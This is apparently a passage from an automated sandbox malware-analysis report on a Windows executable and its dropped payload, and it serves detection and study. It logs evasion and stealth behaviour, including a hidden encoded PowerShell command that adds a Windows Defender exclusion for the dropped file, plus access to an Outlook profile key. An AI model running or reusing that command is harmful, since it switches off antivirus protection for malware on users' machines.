                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                Source: 9RM52QaURq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                Source: 9RM52QaURq.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: 9RM52QaURq.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: C:\Users\outgl\source\repos\Installer_sharp\obj\Release\Installer_sharp.pdb source: 9RM52QaURq.exe
                Source: Binary string: C:\Users\outgl\source\repos\Installer_sharp\obj\Release\Installer_sharp.pdb8 source: 9RM52QaURq.exe

                Data Obfuscation

                barindex
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcA
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAzADgASABzAHEAdwBIAGwAYgBHAFwAMwBVAHUAeABUAEgANgBGAE0AWAAuAGUAeABlACcAJump to behavior
                Source: 9RM52QaURq.exeStatic PE information: 0xB9F2BE74 [Fri Nov 9 13:30:28 2068 UTC]
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFB8B820 LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,FreeLibrary,8_2_00000218BFB8B820
                Source: C:\Users\user\Desktop\9RM52QaURq.exeCode function: 0_2_0735947F pushfd ; retf 0_2_07359485
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A56678 push esp; retf 5_2_04A56691
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A55DDA push esp; ret 5_2_04A55DE3
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A51D73 pushad ; iretd 5_2_04A51DF2
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A51E03 pushad ; iretd 5_2_04A51E12
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 5_2_04A51E13 pushad ; iretd 5_2_04A51E22
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBCE89C push rbx; iretd 8_2_00000218BFBCE89D
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBCE874 push rbx; iretd 8_2_00000218BFBCE875
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00007FF7AA11E600 push rcx; iretd 8_2_00007FF7AA11E601
                Source: C:\Users\user\Desktop\9RM52QaURq.exeFile created: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeJump to dropped file
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBC6480 ExitProcess,OpenMutexA,ExitProcess,CreateMutexA,CreateMutexExA,ExitProcess,ReleaseMutex,CloseHandle,8_2_00000218BFBC6480

                Hooking and other Techniques for Hiding and Protection

                barindex
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeMemory allocated: 1110000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeMemory allocated: 2A70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeMemory allocated: 4A70000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeMemory allocated: 7690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeMemory allocated: 33690000 memory reserve | memory write watchJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeWindow / User API: threadDelayed 4643Jump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exeWindow / User API: threadDelayed 5267Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5641Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4209Jump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_8-80008
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -99875s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -99766s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -99641s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -99516s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -99406s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -99297s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -99188s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -99063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -98938s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -98828s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -98719s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -98594s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -98484s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -98375s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -98189s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\9RM52QaURq.exe TID: 2008Thread sleep time: -98000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5428Thread sleep count: 5641 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2364Thread sleep count: 4209 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3052Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC098C0 GetFileAttributesExW,GetLastError,FindFirstFileW,GetLastError,FindClose,__std_fs_open_handle,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,GetFileInformationByHandleEx,GetLastError,CloseHandle,CloseHandle,CloseHandle,8_2_00000218BFC098C0
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFC09810 FindClose,FindFirstFileExW,GetLastError,8_2_00000218BFC09810
                Source: C:\Users\user\AppData\Local\Temp\38HsqwHlbG\3UuxTH6FMX.exeCode function: 8_2_00000218BFBD13B0 GetLogicalDriveStringsW,8_2_00000218BFBD13B0
